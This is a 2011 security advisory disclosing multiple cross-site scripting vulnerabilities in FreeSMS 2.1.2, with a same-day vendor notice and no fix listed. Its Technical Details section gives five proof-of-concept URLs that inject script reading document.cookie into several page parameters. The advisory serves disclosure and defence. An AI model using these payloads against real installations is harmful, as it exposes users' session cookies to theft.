SSCHADV2011-028 - FreeSMS Multiple Cross-site Scripting Vulnerabilities
Advisory:
|
FreeSMS Multiple Cross-site Scripting Vulnerabilities
|
Advisory ID:
|
SSCHADV2011-028
|
Author:
|
Stefan Schurtz
|
Affected Software:
|
Successfully tested on FreeSMS 2.1.2 |
Vendor URL:
|
|
Vendor Status:
|
informed
|
CVE-ID:
|
-
|
======================
Vulnerability Description:
======================
Vulnerability Description:
======================
FreeSMS (Free Student Management System) is prone to multiple Cross-Site scripting vulernabilities
==============
Technical Details:
==============
Technical Details:
==============
http://<target>/FreeSMS/pages/crc_handler.php?method=’"<script>alert(document.cookie)</script>
http://<target>/FreeSMS/pages/crc_handler.php?method=profile&func=’"<script>alert(document.cookie)</script>
|
http://<target>/FreeSMS/pages/crc_evaluation.php?crc=diggks5j3mlf6pee6knk34qq60&uid=3&course=’"</script><script>alert(document.cookie)</script>
http://<target>/FreeSMS/pages/crc_handler.php?method=register&func=add -> Username -> ‘"</script><script>alert(document.cookie)</script>
|
http://<target>/FreeSMS/pages/crc_login.php?crc=diggks5j3mlf6pee6knk34qq60&uid=’"</script><script>alert(document.cookie)</script>
|
=====
Solution:
=====
-
================
Disclosure Timeline:
================
15-Oct-2011 – informed developers
15-Oct-2011 – release date of this security advisory
====
Credits:
====
Vulnerabilities found and advisory written by Stefan Schurtz.
=======
References:
=======
https://sourceforge.net/projects/freesms/
http://www.rul3z.de/advisories/SSCHADV2011-028.txt
====
Credits:
====
Vulnerabilities found and advisory written by Stefan Schurtz.
=======
References:
=======
https://sourceforge.net/projects/freesms/
http://www.rul3z.de/advisories/SSCHADV2011-028.txt
Comments
Display comments as Linear | Threaded